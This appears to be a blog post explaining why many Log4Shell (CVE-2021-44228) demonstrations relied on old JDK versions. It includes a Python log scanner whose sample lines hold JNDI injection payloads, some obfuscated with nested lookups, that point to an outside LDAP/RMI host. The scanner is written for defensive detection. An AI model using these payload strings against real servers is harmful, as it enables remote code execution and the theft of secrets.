I won't detail the vulnerability here; if you don't know it, first check my repo KosmX/CVE-2021-44228-example, or use an external reference. Be aware that most of the online details about this are misleading!
The vulnerability was discovered on December 9th, 2021.
In short, you can trigger JNDI lookups by getting a specially crafted string logged.
And there are GH repos saying the same.
Most misleading news refers to https://twitter.com/_JohnHammond as proof or main source. He shared multiple images of successfully using the exploit on Minecraft.
No matter how hard I tried to reproduce the result or run other examples, it just didn't work (latest version of the Microsoft JDK 17).
But what did I do wrong?
At the time, I did not know what JNDI is for; I just tried to copy code.
Eventually I understood JNDI well enough to realize the missing part.
A JNDI lookup loads remote objects of known types.
It does this through an ObjectFactory (an interface that receives the data and outputs a copy of the remote object).
JNDI does NOT load remote code, and it never will.
Oh, wait.
Another vulnerability? In LDAP?
Some PoCs include the malicious class in the classpath; others use another vulnerability paired with this one.
The most commonly used vulnerability:
Java™ SE Development Kit 8, Update 191 Release Notes (oracle.com)
At the bottom:
JDK-8196902 (not public)
This release also contains fixes for security vulnerabilities described in the Oracle Critical Patch Update. For a more complete list of the bug fixes included in this release, see the JDK 8u191 Bug Fixes page.
So what?
The README of veracode-research/rogue-jndi: A malicious LDAP server for JNDI injection attacks (github.com) describes this as:
- RemoteReference.java - classic JNDI attack, leads to RCE via remote classloading, works up to jdk8u191
So, with a malicious payload, we can load a remote class in Java...
And with CVE-2021-44228 we can request that class loading on the target machine.
Using this in practice is just not realistic, since it requires a JDK older than 8u191.
And even if such systems exist, no-one found them.
Most likely because John Hammond did not mention it in his tweets.
Journalists don't check whether the science is correct; they just write about it, as fast as possible.
And this can lead to some confusion.
This is not the only way Log4j can be exploited, but it is the one most commonly used in PoCs.
There are other JNDI vulnerabilities; rogue-jndi lists 5 of them.
Don't worry, the Log4j2 exploit is still a very powerful vulnerability. Paired with another JNDI vulnerability, it can lead to RCE.
It can also be used to extract environment variables, and for that no other vulnerability is needed.
More about this here: KosmX/CVE-2021-44228-example
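Because the trigger is simply a logged string, the usual defensive check is to search logs for lookups that resolve to a JNDI reference. The detector below is an added example, not code from this post or the linked repo: it resolves Log4j 2.x's nested ${...} lookups (the lower lookup and the :-default syntax) the way Log4j does before matching, and the sample log lines are constructed.

```python
import re

# Constructed sample log lines (not from the post); 198.51.100.0/24 is a documentation range.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html" "Mozilla/5.0"',
    '10.0.0.6 - - "GET /login" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - "GET /" "${${lower:J}ndi:ldap://198.51.100.7:1389/b}"',
    '10.0.0.8 - - "GET /" "${${env:NOPE:-j}ndi:rmi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - "GET /" "${date:yyyy-MM-dd} ${env:HOME}"',
]
JNDI_TARGET = re.compile(r'jndi:[a-z]+://[^\s"}]+', re.I)   # matched against the resolved text

def _eval_lookup(body):
    # One ${...} body is 'prefix:value', optionally with a ':-default' used when the lookup fails.
    body, has_default, default = body.partition(":-")
    prefix, _, value = body.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return value.lower()
    if prefix == "jndi":                   # the dangerous one: keep it resolved so the caller can match it
        return "jndi:" + value
    # env/sys/date/... cannot be resolved offline: use the default if one was given, else keep the raw text
    return default if has_default else "${" + body + "}"

def resolve_lookups(s):
    # Expand nested ${...} innermost-first, as Log4j 2.x does before the JNDI lookup fires.
    out, i = [], 0
    while i < len(s):
        if not s.startswith("${", i):
            out.append(s[i]); i += 1
            continue
        j, level = i + 2, 1
        while j < len(s) and level:        # find the matching close brace
            if s.startswith("${", j):
                level += 1; j += 2
            else:
                level -= (s[j] == "}"); j += 1
        if level:                          # unbalanced: keep the remainder verbatim
            out.append(s[i:]); break
        out.append(_eval_lookup(resolve_lookups(s[i + 2:j - 1])))
        i = j
    return "".join(out)

def find_jndi_lookups(lines):
    # (original line, resolved JNDI target) for each line whose lookups resolve to a JNDI reference
    hits = [(line, JNDI_TARGET.search(resolve_lookups(line))) for line in lines if "${" in line]
    return [(line, m.group(0)) for line, m in hits if m]
```

Run over SAMPLE_LOG it flags the three lines that resolve to a JNDI reference and leaves the benign date/env lookups alone.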
Later John Hammond released a video where he shows the exploit, and indeed he uses an old Java. BUT not a word about it.
https://www.youtube.com/watch?v=7qoPDq41xhQ